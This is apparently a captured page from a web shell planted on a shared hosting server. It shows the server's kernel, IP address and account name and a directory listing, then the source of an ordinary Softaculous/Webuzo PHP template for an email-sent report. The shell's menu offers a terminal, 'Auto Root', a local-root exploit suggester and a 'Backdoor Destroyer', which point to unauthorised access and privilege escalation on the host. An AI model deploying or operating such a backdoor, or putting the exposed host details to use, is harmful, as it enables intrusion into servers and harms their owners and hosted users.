Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
apps /
exim /
themes /
enduser /
Delete
Unzip
Name
Size
Permission
Date
Action
add_email_account_theme.php
12.54
KB
-rw-r--r--
2025-11-17 07:49
add_email_autoresponder_theme.php
11.93
KB
-rw-r--r--
2025-01-13 08:52
address_importer_theme.php
6.47
KB
-rw-r--r--
2024-05-02 06:56
boxtrapper_theme.php
25.58
KB
-rw-r--r--
2024-04-30 09:23
configure_greylisting_theme.php
6.45
KB
-rw-r--r--
2024-04-17 09:30
create_email_filter_theme.php
20.91
KB
-rw-r--r--
2025-01-13 08:52
default_address_theme.php
4.9
KB
-rw-r--r--
2024-05-02 06:10
edit_email_autoresponder_theme.php
6.17
KB
-rw-r--r--
2025-01-13 08:52
email_account_theme.php
11.13
KB
-rw-r--r--
2026-01-22 06:40
email_deliverability_theme.php
23.14
KB
-rw-r--r--
2025-08-13 08:32
email_filter_theme.php
6.64
KB
-rw-r--r--
2024-05-02 06:56
email_forward_theme.php
10.1
KB
-rw-r--r--
2025-03-28 03:34
email_queue_theme.php
4.32
KB
-rw-r--r--
2024-05-02 06:10
email_relayers_theme.php
4.11
KB
-rw-r--r--
2024-05-02 06:10
email_router_theme.php
5.93
KB
-rw-r--r--
2024-05-02 06:10
email_sent_summary_theme.php
5.02
KB
-rw-r--r--
2024-05-02 06:10
email_settings_theme.php
2.32
KB
-rw-r--r--
2023-10-27 04:12
email_split_delivery_theme.php
4.09
KB
-rw-r--r--
2024-04-30 08:12
encryption_theme.php
11.61
KB
-rw-r--r--
2024-05-02 06:10
track_email_delivery_theme.php
17.39
KB
-rw-r--r--
2025-08-29 09:11
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // WEBUZO CONTROL PANEL // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Pulkit // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: https://webuzo.com/ (WEBUZO) // ---------------------------------------------------------- // Please Read the Terms of Use at https://webuzo.com/terms // ---------------------------------------------------------- //=========================================================== // (c) Softaculous Ltd. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } function exim_email_sent_summary_theme(){ global $theme, $globals, $langs, $totalResult, $error, $data, $done, $start, $end; error_handle($error); $max_date = date("Y-m-d\TH:i",strtotime("+1 days")); $min_date = date('Y-m-d\TH:i',strtotime("-9 days")); echo ' <style> .sent{ color: #000 !important; font-weight: 400; } table td a{ text-decoration: none; } </style> <div class="card soft-card p-3 container" > <div class="sai_main_head "> <img src="'.EXIM_ASSETS.'email_sent_summary.png" alt="" class="webu_head_img me-2" style="width: 48px;"> <h5 class="d-inline-block">'.__('Email Sent Summary').'</h5> <span class=" float-end"> <i class="fa fa-info-circle sai-info" data-bs-html="true" data-bs-toggle="tooltip" title="" data-bs-original-title="'.__('This feature will show you all your failed attempts with the total number of bytes sent').'<br>'.__('Data is retained for 10 days').'"></i> </span> </div> </div> <div class="card soft-card p-4 container mt-4" > <form accept-charset="'.$globals['charset'].'" name="email_sent_summary" method="GET" action="'.$globals['ind'].'act=email_sent_summary"> <input type="hidden" name="act" value="email_sent_summary"> <div class="row mb-5"> <div class="col-md-5"> <label>'.__('Start Date').':</label> <input type="datetime-local" class="form-control" value="'.date("Y-m-d\TH:i", $start).'" onchange="endtime()" name="start_date" id="start_date" min="'.$min_date.'" max="'.$max_date.'"> </div> <div class="col-md-5"> <label>'.__('End Date').':</label> <input type="datetime-local" class="form-control" name="end_date" value="'.date("Y-m-d\TH:i", $end).'" id="end_date" min="'.$min_date.'" max="'.$max_date.'"> </div> <div class="col-md-2"> <br><button class="btn flat-butt" type="submit" name="run_report">'.__('Run Report').'</button> </div> </div> </form>'; page_links(); echo ' <div class="table-responsive pt-2"> <table border="0" cellpadding="8" class="table sai_form webuzo-table"> <thead class="sai_head2"> <tr> <th>'.__('Domain').'</th> <th>'.__('User').'</th> <th class="text-end">'.__('Successful').'</th> <th class="text-end">'.__('Deferrals').'</th> <th class="text-end">'.__('Failures').'</th> <th class="text-end">'.__('Failed and Deferred').'</th> <th class="text-end">'.__('Total').'</th> <th class="text-end">'.__('Data Sent').'</th> </tr> </thead> <tbody>'; if(!empty($data)){ foreach ($data as $key => $value) { $link = $globals['ind'].'act=track_email_delivery&type=user&match=eq&search='.$value['user'].'&start_date='.date("Y-m-d\TH:i", $start).'&end_date='.date("Y-m-d\TH:i", $end); echo ' <tr> <td> <a href="'.$link.'"><span class="sent">'.$value['domain'].'</span></a> </td> <td> <a href="'.$link.'"><span class="sent">'.$value['user'].'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.$value['success'].'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.$value['deferred'].'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.$value['failed'].'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.($value['deferred'] + $value['failed']).'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.$value['total'].'</span></a> </td> <td class="text-end"> <a href="'.$link.'"><span class="sent">'.bytes_to_human($value['size']).'</span></a> </td> </tr>'; } }else{ echo ' <tr> <td class="text-center" colspan="100"> <span>'.__('No data found for the given date').'</span> </td> </tr>'; } echo ' </tbody> </table> </div>'; page_links(); echo ' </div> <script> function endtime(){ var start_date = document.getElementById("start_date").value; document.getElementById("end_date").min = start_date; } $( ".sent" ).click(function() { setcookie("sub_menu_active", "tab_email_delivery_report"); }); </script>'; }